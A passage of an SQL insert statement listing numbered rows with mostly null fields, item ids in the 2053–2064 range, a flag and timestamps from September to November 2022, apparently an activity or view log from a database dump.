(2392, NULL, NULL, 2058, 1, '2022-09-19 06:07:46'),
(2393, NULL, NULL, 2055, 1, '2022-09-19 06:14:47'),
(2394, NULL, NULL, 2061, 1, '2022-09-19 06:27:05'),
(2395, NULL, NULL, 2062, 1, '2022-09-19 06:33:34'),
(2396, NULL, NULL, 2054, 1, '2022-09-19 06:45:00'),
(2397, NULL, NULL, 2059, 1, '2022-09-19 06:47:19'),
(2398, NULL, NULL, 2064, 1, '2022-09-19 06:49:10'),
(2399, NULL, NULL, 2064, 1, '2022-09-19 07:51:01'),
(2400, NULL, NULL, 2064, 1, '2022-09-19 07:51:07'),
(2401, NULL, NULL, 2058, 1, '2022-09-19 14:56:22'),
(2402, NULL, NULL, 2064, 1, '2022-09-19 16:10:25'),
(2403, NULL, NULL, 2054, 1, '2022-09-19 20:10:08'),
(2404, NULL, NULL, 2054, 1, '2022-09-20 02:40:18'),
(2405, NULL, NULL, 2062, 1, '2022-09-20 02:40:19'),
(2406, NULL, NULL, 2064, 1, '2022-09-20 02:40:19'),
(2407, NULL, NULL, 2063, 1, '2022-09-20 02:40:20'),
(2408, NULL, NULL, 2058, 1, '2022-09-20 02:40:20'),
(2409, NULL, NULL, 2059, 1, '2022-09-20 02:40:20'),
(2410, NULL, NULL, 2055, 1, '2022-09-20 02:40:23'),
(2411, NULL, NULL, 2060, 1, '2022-09-20 02:40:27'),
(2412, NULL, NULL, 2061, 1, '2022-09-20 02:40:29'),
(2413, NULL, NULL, 2064, 1, '2022-09-20 04:10:51'),
(2414, NULL, NULL, 2064, 1, '2022-09-20 04:10:53'),
(2415, NULL, NULL, 2064, 1, '2022-09-20 04:13:03'),
(2416, NULL, NULL, 2064, 1, '2022-09-20 04:13:04'),
(2417, NULL, NULL, 2064, 1, '2022-09-20 04:13:06'),
(2418, NULL, NULL, 2064, 1, '2022-09-20 04:13:07'),
(2419, NULL, NULL, 2064, 1, '2022-09-20 04:13:07'),
(2420, 489, NULL, 2064, 1, '2022-09-20 04:14:10'),
(2421, NULL, NULL, 2054, 1, '2022-09-20 16:12:45'),
(2422, NULL, NULL, 2063, 1, '2022-09-21 14:19:12'),
(2423, NULL, NULL, 2054, 1, '2022-09-21 16:08:25'),
(2424, NULL, NULL, 2055, 1, '2022-09-21 16:08:55'),
(2425, NULL, NULL, 2064, 1, '2022-09-21 16:10:53'),
(2426, NULL, NULL, 2063, 1, '2022-09-21 16:11:24'),
(2427, NULL, NULL, 2062, 1, '2022-09-21 16:11:54'),
(2428, NULL, NULL, 2060, 1, '2022-09-21 16:12:24'),
(2429, NULL, NULL, 2059, 1, '2022-09-21 16:12:54'),
(2430, NULL, NULL, 2061, 1, '2022-09-21 16:13:25'),
(2431, NULL, NULL, 2058, 1, '2022-09-21 16:13:55'),
(2432, NULL, NULL, 2062, 1, '2022-09-21 22:31:59'),
(2433, NULL, NULL, 2053, 1, '2022-09-22 03:12:28'),
(2434, NULL, NULL, 2064, 1, '2022-09-22 09:35:04'),
(2435, NULL, NULL, 2063, 1, '2022-09-22 10:52:38'),
(2436, NULL, NULL, 2064, 1, '2022-09-22 11:18:00'),
(2437, NULL, NULL, 2063, 1, '2022-09-22 11:34:52'),
(2438, NULL, NULL, 2055, 1, '2022-09-22 12:51:00'),
(2439, NULL, NULL, 2061, 1, '2022-09-22 14:18:40'),
(2440, NULL, NULL, 2061, 1, '2022-09-22 15:12:23'),
(2441, NULL, NULL, 2054, 1, '2022-09-22 15:48:40'),
(2442, NULL, NULL, 2059, 1, '2022-09-22 20:02:03'),
(2443, NULL, NULL, 2053, 1, '2022-09-22 21:55:18'),
(2444, NULL, NULL, 2062, 1, '2022-09-23 03:06:13'),
(2445, NULL, NULL, 2053, 1, '2022-09-23 12:09:13'),
(2446, NULL, NULL, 2064, 1, '2022-09-23 20:11:07'),
(2447, NULL, NULL, 2061, 1, '2022-09-23 21:45:06'),
(2448, NULL, NULL, 2055, 1, '2022-09-24 00:34:11'),
(2449, NULL, NULL, 2062, 1, '2022-09-24 01:56:53'),
(2450, NULL, NULL, 2053, 1, '2022-09-24 02:38:49'),
(2451, NULL, NULL, 2062, 1, '2022-09-24 04:10:59'),
(2452, NULL, NULL, 2063, 1, '2022-09-24 05:15:46'),
(2453, NULL, NULL, 2063, 1, '2022-09-24 05:15:53'),
(2454, NULL, NULL, 2063, 1, '2022-09-24 09:33:46'),
(2455, NULL, NULL, 2062, 1, '2022-09-24 09:39:42'),
(2456, NULL, NULL, 2060, 1, '2022-09-24 09:39:49'),
(2457, NULL, NULL, 2059, 1, '2022-09-24 09:39:54'),
(2458, NULL, NULL, 2064, 1, '2022-09-24 11:35:28'),
(2459, NULL, NULL, 2058, 1, '2022-09-25 03:34:37'),
(2460, NULL, NULL, 2058, 1, '2022-09-25 09:37:47'),
(2461, NULL, NULL, 2064, 1, '2022-09-25 09:37:53'),
(2462, NULL, NULL, 2059, 1, '2022-09-25 11:32:49'),
(2463, NULL, NULL, 2064, 1, '2022-09-25 19:32:30'),
(2464, NULL, NULL, 2063, 1, '2022-09-25 23:05:38'),
(2465, NULL, NULL, 2063, 1, '2022-09-26 01:21:38'),
(2466, NULL, NULL, 2063, 1, '2022-09-26 01:21:39'),
(2467, NULL, NULL, 2064, 1, '2022-09-26 13:23:49'),
(2468, NULL, NULL, 2061, 1, '2022-09-26 15:03:29'),
(2469, NULL, NULL, 2064, 1, '2022-09-27 03:04:29'),
(2470, NULL, NULL, 2062, 1, '2022-09-27 03:21:12'),
(2471, NULL, NULL, 2054, 1, '2022-09-27 05:15:54'),
(2472, NULL, NULL, 2059, 1, '2022-09-27 11:15:01'),
(2473, NULL, NULL, 2063, 1, '2022-09-27 12:13:05'),
(2474, NULL, NULL, 2062, 1, '2022-09-27 13:05:42'),
(2475, NULL, NULL, 2063, 1, '2022-09-27 13:05:44'),
(2476, NULL, NULL, 2061, 1, '2022-09-27 13:18:50'),
(2477, NULL, NULL, 2054, 1, '2022-09-27 15:18:43'),
(2478, NULL, NULL, 2054, 1, '2022-09-27 22:21:11'),
(2479, NULL, NULL, 2061, 1, '2022-09-28 04:43:48'),
(2480, NULL, NULL, 2054, 1, '2022-09-28 07:25:42'),
(2481, NULL, NULL, 2061, 1, '2022-09-28 08:57:33'),
(2482, NULL, NULL, 2064, 1, '2022-09-29 05:22:04'),
(2483, NULL, NULL, 2062, 1, '2022-09-29 12:09:03'),
(2484, NULL, NULL, 2061, 1, '2022-09-29 12:33:08'),
(2485, NULL, NULL, 2064, 1, '2022-09-29 15:17:35'),
(2486, NULL, NULL, 2060, 1, '2022-09-30 01:20:14'),
(2487, NULL, NULL, 2063, 1, '2022-09-30 01:20:24'),
(2488, NULL, NULL, 2058, 1, '2022-09-30 01:20:32'),
(2489, NULL, NULL, 2055, 1, '2022-09-30 01:27:44'),
(2490, NULL, NULL, 2053, 1, '2022-09-30 01:29:20'),
(2491, NULL, NULL, 2061, 1, '2022-09-30 01:42:20'),
(2492, NULL, NULL, 2062, 1, '2022-09-30 01:50:15'),
(2493, NULL, NULL, 2054, 1, '2022-09-30 02:06:16'),
(2494, NULL, NULL, 2059, 1, '2022-09-30 02:09:45'),
(2495, NULL, NULL, 2064, 1, '2022-09-30 02:12:33'),
(2496, NULL, NULL, 2060, 1, '2022-09-30 10:57:39'),
(2497, NULL, NULL, 2061, 1, '2022-09-30 11:06:56'),
(2498, NULL, NULL, 2059, 1, '2022-09-30 11:16:18'),
(2499, NULL, NULL, 2064, 1, '2022-09-30 11:24:44'),
(2500, NULL, NULL, 2062, 1, '2022-09-30 11:32:11'),
(2501, NULL, NULL, 2055, 1, '2022-09-30 11:43:47'),
(2502, NULL, NULL, 2063, 1, '2022-09-30 11:53:53'),
(2503, NULL, NULL, 2058, 1, '2022-09-30 11:56:52'),
(2504, NULL, NULL, 2060, 1, '2022-09-30 15:37:57'),
(2505, NULL, NULL, 2062, 1, '2022-10-01 05:21:59'),
(2506, NULL, NULL, 2059, 1, '2022-10-01 11:36:01'),
(2507, NULL, NULL, 2059, 1, '2022-10-01 11:40:29'),
(2508, NULL, NULL, 2061, 1, '2022-10-01 19:03:06'),
(2509, NULL, NULL, 2054, 1, '2022-10-01 23:56:12'),
(2510, NULL, NULL, 2055, 1, '2022-10-01 23:56:15'),
(2511, NULL, NULL, 2064, 1, '2022-10-01 23:56:22'),
(2512, NULL, NULL, 2063, 1, '2022-10-01 23:56:24'),
(2513, NULL, NULL, 2062, 1, '2022-10-01 23:56:25'),
(2514, NULL, NULL, 2060, 1, '2022-10-01 23:56:27'),
(2515, NULL, NULL, 2059, 1, '2022-10-01 23:56:28'),
(2516, NULL, NULL, 2061, 1, '2022-10-01 23:56:30'),
(2517, NULL, NULL, 2058, 1, '2022-10-01 23:56:32'),
(2518, NULL, NULL, 2059, 1, '2022-10-03 04:22:43'),
(2519, NULL, NULL, 2058, 1, '2022-10-03 07:32:00'),
(2520, NULL, NULL, 2062, 1, '2022-10-03 10:52:49'),
(2521, NULL, NULL, 2064, 1, '2022-10-03 19:37:16'),
(2522, NULL, NULL, 2055, 1, '2022-10-03 19:37:18'),
(2523, NULL, NULL, 2062, 1, '2022-10-04 02:49:05'),
(2524, NULL, NULL, 2054, 1, '2022-10-04 03:34:23'),
(2525, NULL, NULL, 2055, 1, '2022-10-04 03:51:50'),
(2526, NULL, NULL, 2058, 1, '2022-10-04 05:33:00'),
(2527, NULL, NULL, 2061, 1, '2022-10-04 05:43:27'),
(2528, NULL, NULL, 2064, 1, '2022-10-04 07:37:52'),
(2529, NULL, NULL, 2059, 1, '2022-10-04 16:49:42'),
(2530, NULL, NULL, 2064, 1, '2022-10-04 17:47:56'),
(2531, NULL, NULL, 2054, 1, '2022-10-04 20:39:00'),
(2532, NULL, NULL, 2061, 1, '2022-10-04 22:45:01'),
(2533, NULL, NULL, 2063, 1, '2022-10-05 03:03:35'),
(2534, NULL, NULL, 2063, 1, '2022-10-05 03:03:37'),
(2535, NULL, NULL, 2063, 1, '2022-10-05 10:55:19'),
(2536, NULL, NULL, 2058, 1, '2022-10-05 10:58:07'),
(2537, NULL, NULL, 2058, 1, '2022-10-05 10:58:09'),
(2538, NULL, NULL, 2060, 1, '2022-10-05 12:03:55'),
(2539, NULL, NULL, 2060, 1, '2022-10-05 12:06:50'),
(2540, NULL, NULL, 2055, 1, '2022-10-05 22:38:14'),
(2541, NULL, NULL, 2053, 1, '2022-10-06 13:45:03'),
(2542, NULL, NULL, 2062, 1, '2022-10-06 14:46:52'),
(2543, NULL, NULL, 2058, 1, '2022-10-06 18:09:02'),
(2544, NULL, NULL, 2062, 1, '2022-10-06 22:03:53'),
(2545, NULL, NULL, 2063, 1, '2022-10-06 22:05:24'),
(2546, NULL, NULL, 2061, 1, '2022-10-06 22:05:51'),
(2547, NULL, NULL, 2059, 1, '2022-10-06 22:06:07'),
(2548, NULL, NULL, 2058, 1, '2022-10-06 22:06:32'),
(2549, NULL, NULL, 2055, 1, '2022-10-06 22:07:06'),
(2550, NULL, NULL, 2063, 1, '2022-10-07 00:15:16'),
(2551, NULL, NULL, 2054, 1, '2022-10-07 11:20:33'),
(2552, NULL, NULL, 2055, 1, '2022-10-07 11:20:51'),
(2553, NULL, NULL, 2064, 1, '2022-10-07 11:22:01'),
(2554, NULL, NULL, 2063, 1, '2022-10-07 11:22:19'),
(2555, NULL, NULL, 2062, 1, '2022-10-07 11:22:36'),
(2556, NULL, NULL, 2060, 1, '2022-10-07 11:22:54'),
(2557, NULL, NULL, 2059, 1, '2022-10-07 11:23:11'),
(2558, NULL, NULL, 2061, 1, '2022-10-07 11:23:29'),
(2559, NULL, NULL, 2058, 1, '2022-10-07 11:23:46'),
(2560, NULL, NULL, 2054, 1, '2022-10-07 18:45:06'),
(2561, NULL, NULL, 2060, 1, '2022-10-07 18:45:49'),
(2562, NULL, NULL, 2061, 1, '2022-10-07 22:13:41'),
(2563, NULL, NULL, 2059, 1, '2022-10-08 04:10:05'),
(2564, NULL, NULL, 2061, 1, '2022-10-08 04:17:13'),
(2565, NULL, NULL, 2055, 1, '2022-10-08 04:28:14'),
(2566, NULL, NULL, 2061, 1, '2022-10-08 04:33:38'),
(2567, NULL, NULL, 2061, 1, '2022-10-08 05:09:53'),
(2568, NULL, NULL, 2063, 1, '2022-10-08 06:41:36'),
(2569, NULL, NULL, 2062, 1, '2022-10-08 06:45:26'),
(2570, NULL, NULL, 2062, 1, '2022-10-08 06:46:41'),
(2571, NULL, NULL, 2053, 1, '2022-10-08 10:06:51'),
(2572, NULL, NULL, 2061, 1, '2022-10-08 16:06:59'),
(2573, NULL, NULL, 2061, 1, '2022-10-08 16:38:01'),
(2574, NULL, NULL, 2064, 1, '2022-10-08 21:24:08'),
(2575, NULL, NULL, 2064, 1, '2022-10-09 04:33:52'),
(2576, NULL, NULL, 2054, 1, '2022-10-09 05:08:48'),
(2577, NULL, NULL, 2061, 1, '2022-10-09 05:40:42'),
(2578, NULL, NULL, 2064, 1, '2022-10-09 07:09:48'),
(2579, NULL, NULL, 2064, 1, '2022-10-09 09:22:07'),
(2580, NULL, NULL, 2064, 1, '2022-10-09 16:00:41'),
(2581, NULL, NULL, 2064, 1, '2022-10-09 16:01:48'),
(2582, NULL, NULL, 2059, 1, '2022-10-09 17:15:47'),
(2583, NULL, NULL, 2063, 1, '2022-10-10 04:38:44'),
(2584, NULL, NULL, 2063, 1, '2022-10-10 04:39:05'),
(2585, NULL, NULL, 2064, 1, '2022-10-10 06:34:00'),
(2586, NULL, NULL, 2064, 1, '2022-10-10 06:34:29'),
(2587, NULL, NULL, 2062, 1, '2022-10-10 09:33:04'),
(2588, NULL, NULL, 2061, 1, '2022-10-10 09:51:15'),
(2589, NULL, NULL, 2055, 1, '2022-10-10 13:00:42'),
(2590, NULL, NULL, 2054, 1, '2022-10-10 13:30:14'),
(2591, NULL, NULL, 2064, 1, '2022-10-10 14:38:35'),
(2592, NULL, NULL, 2061, 1, '2022-10-10 18:28:16'),
(2593, NULL, NULL, 2061, 1, '2022-10-10 20:01:25'),
(2594, NULL, NULL, 2059, 1, '2022-10-10 20:16:05'),
(2595, NULL, NULL, 2055, 1, '2022-10-10 20:41:05'),
(2596, NULL, NULL, 2061, 1, '2022-10-10 20:52:31'),
(2597, NULL, NULL, 2059, 1, '2022-10-10 20:55:44'),
(2598, NULL, NULL, 2054, 1, '2022-10-10 21:24:40'),
(2599, NULL, NULL, 2054, 1, '2022-10-11 18:40:50'),
(2600, NULL, NULL, 2064, 1, '2022-10-11 21:11:00'),
(2601, NULL, NULL, 2058, 1, '2022-10-12 07:11:16'),
(2602, NULL, NULL, 2058, 1, '2022-10-12 19:19:59'),
(2603, NULL, NULL, 2064, 1, '2022-10-13 00:41:49'),
(2604, NULL, NULL, 2060, 1, '2022-10-13 11:17:51'),
(2605, NULL, NULL, 2055, 1, '2022-10-13 15:11:29'),
(2606, NULL, NULL, 2064, 1, '2022-10-13 19:04:08'),
(2607, NULL, NULL, 2055, 1, '2022-10-14 04:33:43'),
(2608, NULL, NULL, 2064, 1, '2022-10-14 04:33:47'),
(2609, NULL, NULL, 2061, 1, '2022-10-14 04:33:51'),
(2610, NULL, NULL, 2058, 1, '2022-10-14 04:33:53'),
(2611, NULL, NULL, 2054, 1, '2022-10-14 10:22:16'),
(2612, NULL, NULL, 2058, 1, '2022-10-14 14:21:55'),
(2613, NULL, NULL, 2061, 1, '2022-10-14 14:34:43'),
(2614, NULL, NULL, 2064, 1, '2022-10-14 15:06:11'),
(2615, NULL, NULL, 2060, 1, '2022-10-14 20:31:06'),
(2616, NULL, NULL, 2054, 1, '2022-10-14 20:45:23'),
(2617, NULL, NULL, 2064, 1, '2022-10-14 23:18:47'),
(2618, NULL, NULL, 2063, 1, '2022-10-15 06:56:16'),
(2619, NULL, NULL, 2060, 1, '2022-10-15 17:08:24'),
(2620, NULL, NULL, 2063, 1, '2022-10-15 18:22:44'),
(2621, NULL, NULL, 2055, 1, '2022-10-15 22:43:48'),
(2622, NULL, NULL, 2064, 1, '2022-10-16 01:30:23'),
(2623, NULL, NULL, 2062, 1, '2022-10-16 03:57:54'),
(2624, NULL, NULL, 2063, 1, '2022-10-16 06:40:19'),
(2625, NULL, NULL, 2058, 1, '2022-10-16 07:01:57'),
(2626, NULL, NULL, 2060, 1, '2022-10-16 07:02:01'),
(2627, NULL, NULL, 2054, 1, '2022-10-16 07:02:02'),
(2628, NULL, NULL, 2059, 1, '2022-10-16 07:02:07'),
(2629, NULL, NULL, 2063, 1, '2022-10-16 07:02:07'),
(2630, NULL, NULL, 2064, 1, '2022-10-16 07:02:08'),
(2631, NULL, NULL, 2062, 1, '2022-10-16 07:02:09'),
(2632, NULL, NULL, 2055, 1, '2022-10-16 07:02:10'),
(2633, NULL, NULL, 2061, 1, '2022-10-16 07:02:11'),
(2634, NULL, NULL, 2058, 1, '2022-10-16 08:34:39'),
(2635, NULL, NULL, 2061, 1, '2022-10-16 14:40:08'),
(2636, NULL, NULL, 2055, 1, '2022-10-16 21:26:21'),
(2637, NULL, NULL, 2053, 1, '2022-10-16 23:22:45'),
(2638, NULL, NULL, 2060, 1, '2022-10-16 23:53:26'),
(2639, NULL, NULL, 2064, 1, '2022-10-17 03:09:45'),
(2640, NULL, NULL, 2060, 1, '2022-10-17 03:10:06'),
(2641, NULL, NULL, 2063, 1, '2022-10-17 03:10:13'),
(2642, NULL, NULL, 2058, 1, '2022-10-17 03:10:22'),
(2643, NULL, NULL, 2059, 1, '2022-10-17 03:10:30'),
(2644, NULL, NULL, 2055, 1, '2022-10-17 03:10:32'),
(2645, NULL, NULL, 2054, 1, '2022-10-17 03:10:39'),
(2646, NULL, NULL, 2062, 1, '2022-10-17 03:10:43'),
(2647, NULL, NULL, 2061, 1, '2022-10-17 03:10:49'),
(2648, NULL, NULL, 2064, 1, '2022-10-17 04:50:33'),
(2649, NULL, NULL, 2064, 1, '2022-10-17 15:34:54'),
(2650, NULL, NULL, 2064, 1, '2022-10-17 16:52:01'),
(2651, NULL, NULL, 2061, 1, '2022-10-17 20:39:32'),
(2652, NULL, NULL, 2055, 1, '2022-10-17 23:56:09'),
(2653, NULL, NULL, 2061, 1, '2022-10-18 02:16:39'),
(2654, NULL, NULL, 2058, 1, '2022-10-18 06:22:22'),
(2655, NULL, NULL, 2055, 1, '2022-10-18 09:52:51'),
(2656, NULL, NULL, 2053, 1, '2022-10-18 15:26:26'),
(2657, NULL, NULL, 2064, 1, '2022-10-18 15:37:21'),
(2658, NULL, NULL, 2064, 1, '2022-10-18 15:48:09'),
(2659, NULL, NULL, 2064, 1, '2022-10-18 15:48:45'),
(2660, NULL, NULL, 2064, 1, '2022-10-18 15:49:21'),
(2661, NULL, NULL, 2053, 1, '2022-10-18 20:46:44'),
(2662, NULL, NULL, 2055, 1, '2022-10-19 04:30:59'),
(2663, NULL, NULL, 2055, 1, '2022-10-19 15:51:25'),
(2664, NULL, NULL, 2064, 1, '2022-10-19 21:09:36'),
(2665, NULL, NULL, 2054, 1, '2022-10-21 07:07:07'),
(2666, NULL, NULL, 2055, 1, '2022-10-21 07:07:13'),
(2667, NULL, NULL, 2064, 1, '2022-10-21 07:07:34'),
(2668, NULL, NULL, 2063, 1, '2022-10-21 07:07:38'),
(2669, NULL, NULL, 2062, 1, '2022-10-21 07:07:44'),
(2670, NULL, NULL, 2060, 1, '2022-10-21 07:07:54'),
(2671, NULL, NULL, 2059, 1, '2022-10-21 07:08:02'),
(2672, NULL, NULL, 2061, 1, '2022-10-21 07:08:06'),
(2673, NULL, NULL, 2058, 1, '2022-10-21 07:08:12'),
(2674, NULL, NULL, 2054, 1, '2022-10-21 07:58:25'),
(2675, NULL, NULL, 2053, 1, '2022-10-21 08:21:40'),
(2676, NULL, NULL, 2054, 1, '2022-10-21 08:21:46'),
(2677, NULL, NULL, 2061, 1, '2022-10-21 20:03:09'),
(2678, NULL, NULL, 2061, 1, '2022-10-21 20:03:13'),
(2679, NULL, NULL, 2061, 1, '2022-10-21 20:03:20'),
(2680, NULL, NULL, 2058, 1, '2022-10-22 13:12:38'),
(2681, NULL, NULL, 2061, 1, '2022-10-22 13:13:25'),
(2682, NULL, NULL, 2059, 1, '2022-10-22 13:14:00'),
(2683, NULL, NULL, 2060, 1, '2022-10-22 13:14:35'),
(2684, NULL, NULL, 2062, 1, '2022-10-22 13:15:10'),
(2685, NULL, NULL, 2063, 1, '2022-10-22 13:15:42'),
(2686, NULL, NULL, 2064, 1, '2022-10-22 13:16:17'),
(2687, NULL, NULL, 2055, 1, '2022-10-22 13:19:44'),
(2688, NULL, NULL, 2054, 1, '2022-10-22 13:20:12'),
(2689, NULL, NULL, 2059, 1, '2022-10-22 13:56:58'),
(2690, NULL, NULL, 2058, 1, '2022-10-22 14:24:30'),
(2691, NULL, NULL, 2061, 1, '2022-10-22 14:24:54'),
(2692, NULL, NULL, 2059, 1, '2022-10-22 14:25:19'),
(2693, NULL, NULL, 2060, 1, '2022-10-22 14:25:43'),
(2694, NULL, NULL, 2062, 1, '2022-10-22 14:26:08'),
(2695, NULL, NULL, 2063, 1, '2022-10-22 14:26:34'),
(2696, NULL, NULL, 2064, 1, '2022-10-22 14:26:56'),
(2697, NULL, NULL, 2055, 1, '2022-10-22 14:30:27'),
(2698, NULL, NULL, 2054, 1, '2022-10-22 14:30:49'),
(2699, NULL, NULL, 2053, 1, '2022-10-22 14:31:13'),
(2700, NULL, NULL, 2063, 1, '2022-10-23 08:47:33'),
(2701, NULL, NULL, 2063, 1, '2022-10-23 08:47:45'),
(2702, NULL, NULL, 2063, 1, '2022-10-23 08:47:46'),
(2703, NULL, NULL, 2063, 1, '2022-10-23 19:01:36'),
(2704, NULL, NULL, 2062, 1, '2022-10-23 20:56:00'),
(2705, NULL, NULL, 2064, 1, '2022-10-25 04:04:04'),
(2706, NULL, NULL, 2055, 1, '2022-10-26 10:02:31'),
(2707, NULL, NULL, 2061, 1, '2022-10-28 08:00:09'),
(2708, NULL, NULL, 2061, 1, '2022-10-29 12:40:30'),
(2709, NULL, NULL, 2064, 1, '2022-10-30 15:34:59'),
(2710, NULL, NULL, 2064, 1, '2022-10-30 15:35:32'),
(2711, NULL, NULL, 2060, 1, '2022-10-31 07:25:54'),
(2712, NULL, NULL, 2063, 1, '2022-10-31 07:28:29'),
(2713, NULL, NULL, 2058, 1, '2022-10-31 07:35:05'),
(2714, NULL, NULL, 2055, 1, '2022-10-31 07:47:31'),
(2715, NULL, NULL, 2061, 1, '2022-10-31 08:06:33'),
(2716, NULL, NULL, 2062, 1, '2022-10-31 08:16:21'),
(2717, NULL, NULL, 2054, 1, '2022-10-31 08:34:04'),
(2718, NULL, NULL, 2059, 1, '2022-10-31 08:37:49'),
(2719, NULL, NULL, 2064, 1, '2022-10-31 08:40:41'),
(2720, NULL, NULL, 2062, 1, '2022-10-31 10:48:56'),
(2721, NULL, NULL, 2063, 1, '2022-10-31 11:25:42'),
(2722, NULL, NULL, 2058, 1, '2022-11-01 07:52:53'),
(2723, NULL, NULL, 2064, 1, '2022-11-01 07:53:05'),
(2724, NULL, NULL, 2062, 1, '2022-11-01 07:53:26'),
(2725, NULL, NULL, 2055, 1, '2022-11-01 07:53:28'),
(2726, NULL, NULL, 2059, 1, '2022-11-01 07:53:36'),
(2727, NULL, NULL, 2063, 1, '2022-11-01 07:53:39'),
(2728, NULL, NULL, 2061, 1, '2022-11-01 07:53:41'),
(2729, NULL, NULL, 2060, 1, '2022-11-01 07:53:54'),
(2730, NULL, NULL, 2054, 1, '2022-11-01 07:53:56'),
(2731, NULL, NULL, 2054, 1, '2022-11-01 07:56:15'),
(2732, NULL, NULL, 2058, 1, '2022-11-01 07:56:21'),
(2733, NULL, NULL, 2064, 1, '2022-11-01 07:56:29'),
(2734, NULL, NULL, 2060, 1, '2022-11-01 07:56:32'),
(2735, NULL, NULL, 2061, 1, '2022-11-01 07:56:48'),
(2736, NULL, NULL, 2062, 1, '2022-11-01 07:56:51'),
(2737, NULL, NULL, 2055, 1, '2022-11-01 07:56:53'),
(2738, NULL, NULL, 2063, 1, '2022-11-01 07:57:00'),
(2739, NULL, NULL, 2059, 1, '2022-11-01 07:57:03'),
(2740, NULL, NULL, 2053, 1, '2022-11-01 07:57:20'),
(2741, NULL, NULL, 2061, 1, '2022-11-01 09:08:44'),
(2742, NULL, NULL, 2060, 1, '2022-11-01 16:17:43'),
(2743, NULL, NULL, 2059, 1, '2022-11-02 01:41:09'),
(2744, NULL, NULL, 2053, 1, '2022-11-03 08:12:34'),
(2745, NULL, NULL, 2055, 1, '2022-11-03 16:57:40'),
(2746, NULL, NULL, 2064, 1, '2022-11-05 10:19:26'),
(2747, NULL, NULL, 2064, 1, '2022-11-05 10:19:26'),
(2748, NULL, NULL, 2064, 1, '2022-11-05 10:19:30'),
(2749, NULL, NULL, 2064, 1, '2022-11-05 10:19:31'),
(2750, NULL, NULL, 2064, 1, '2022-11-05 10:19:33'),
(2751, NULL, NULL, 2063, 1, '2022-11-05 19:22:55'),
(2752, NULL, NULL, 2064, 1, '2022-11-05 19:43:21'),
(2753, NULL, NULL, 2063, 1, '2022-11-05 22:48:54'),
(2754, NULL, NULL, 2060, 1, '2022-11-06 03:26:38'),
(2755, NULL, NULL, 2054, 1, '2022-11-06 03:58:56'),
(2756, NULL, NULL, 2055, 1, '2022-11-06 03:59:00'),
(2757, NULL, NULL, 2063, 1, '2022-11-06 03:59:09'),
(2758, NULL, NULL, 2064, 1, '2022-11-06 03:59:12'),
(2759, NULL, NULL, 2062, 1, '2022-11-06 03:59:18'),
(2760, NULL, NULL, 2054, 1, '2022-11-06 08:09:48'),
(2761, NULL, NULL, 2055, 1, '2022-11-06 08:10:04'),
(2762, NULL, NULL, 2064, 1, '2022-11-06 08:11:15'),
(2763, NULL, NULL, 2063, 1, '2022-11-06 08:11:34'),
(2764, NULL, NULL, 2062, 1, '2022-11-06 08:11:53'),
(2765, NULL, NULL, 2060, 1, '2022-11-06 08:12:09'),
(2766, NULL, NULL, 2059, 1, '2022-11-06 08:12:24'),
(2767, NULL, NULL, 2061, 1, '2022-11-06 08:12:37'),
(2768, NULL, NULL, 2058, 1, '2022-11-06 08:12:48'),
(2769, NULL, NULL, 2053, 1, '2022-11-06 13:02:42'),
(2770, NULL, NULL, 2064, 1, '2022-11-07 11:14:24'),
(2771, NULL, NULL, 2062, 1, '2022-11-07 20:51:20'),
(2772, NULL, NULL, 2064, 1, '2022-11-08 05:25:03'),
(2773, NULL, NULL, 2059, 1, '2022-11-08 07:18:22'),
(2774, NULL, NULL, 2059, 1, '2022-11-08 07:18:26'),
(2775, NULL, NULL, 2055, 1, '2022-11-08 07:18:51'),
(2776, NULL, NULL, 2055, 1, '2022-11-08 07:18:55'),
(2777, NULL, NULL, 2063, 1, '2022-11-08 07:19:03'),
(2778, NULL, NULL, 2063, 1, '2022-11-08 07:19:07'),
(2779, NULL, NULL, 2063, 1, '2022-11-08 21:04:12'),
(2780, NULL, NULL, 2060, 1, '2022-11-08 23:29:43'),
(2781, NULL, NULL, 2063, 1, '2022-11-08 23:31:56'),
(2782, NULL, NULL, 2058, 1, '2022-11-08 23:37:35'),
(2783, NULL, NULL, 2055, 1, '2022-11-08 23:48:03'),
(2784, NULL, NULL, 2061, 1, '2022-11-09 00:04:44'),
(2785, NULL, NULL, 2062, 1, '2022-11-09 00:13:25'),
(2786, NULL, NULL, 2054, 1, '2022-11-09 00:29:10'),
(2787, NULL, NULL, 2059, 1, '2022-11-09 00:32:19'),
(2788, NULL, NULL, 2064, 1, '2022-11-09 00:34:57'),
(2789, NULL, NULL, 2059, 1, '2022-11-09 06:59:35'),
(2790, NULL, NULL, 2064, 1, '2022-11-09 21:48:45'),
(2791, NULL, NULL, 2055, 1, '2022-11-10 02:31:56'),
(2792, NULL, NULL, 2054, 1, '2022-11-10 02:45:29'),
(2793, NULL, NULL, 2061, 1, '2022-11-10 03:29:36'),
(2794, NULL, NULL, 2063, 1, '2022-11-10 07:03:42'),
(2795, NULL, NULL, 2053, 1, '2022-11-10 08:16:09'),
(2796, NULL, NULL, 2064, 1, '2022-11-10 09:53:05'),
(2797, NULL, NULL, 2064, 1, '2022-11-10 10:12:36'),
(2798, NULL, NULL, 2060, 1, '2022-11-10 18:49:40'),
(2799, NULL, NULL, 2059, 1, '2022-11-10 21:50:29'),
(2800, NULL, NULL, 2055, 1, '2022-11-10 22:41:04'),
(2801, NULL, NULL, 2054, 1, '2022-11-11 05:15:47'),
(2802, NULL, NULL, 2063, 1, '2022-11-11 06:21:59'),
(2803, NULL, NULL, 2059, 1, '2022-11-11 06:36:31'),
(2804, NULL, NULL, 2055, 1, '2022-11-11 11:07:48'),
(2805, NULL, NULL, 2064, 1, '2022-11-11 11:58:09'),
(2806, NULL, NULL, 2063, 1, '2022-11-11 18:13:31'),
(2807, NULL, NULL, 2063, 1, '2022-11-11 18:13:33'),
(2808, NULL, NULL, 2064, 1, '2022-11-11 18:23:42'),
(2809, NULL, NULL, 2064, 1, '2022-11-11 18:24:41'),
(2810, NULL, NULL, 2054, 1, '2022-11-11 19:41:37'),
(2811, NULL, NULL, 2060, 1, '2022-11-11 19:41:43'),
(2812, NULL, NULL, 2058, 1, '2022-11-11 19:41:49'),
(2813, NULL, NULL, 2064, 1, '2022-11-11 19:42:02'),
(2814, NULL, NULL, 2062, 1, '2022-11-11 19:42:15'),
(2815, NULL, NULL, 2055, 1, '2022-11-11 19:42:22'),
(2816, NULL, NULL, 2059, 1, '2022-11-11 19:42:31'),
(2817, NULL, NULL, 2063, 1, '2022-11-11 19:42:35'),
(2818, NULL, NULL, 2061, 1, '2022-11-11 19:42:38'),
(2819, NULL, NULL, 2058, 1, '2022-11-11 19:45:05'),
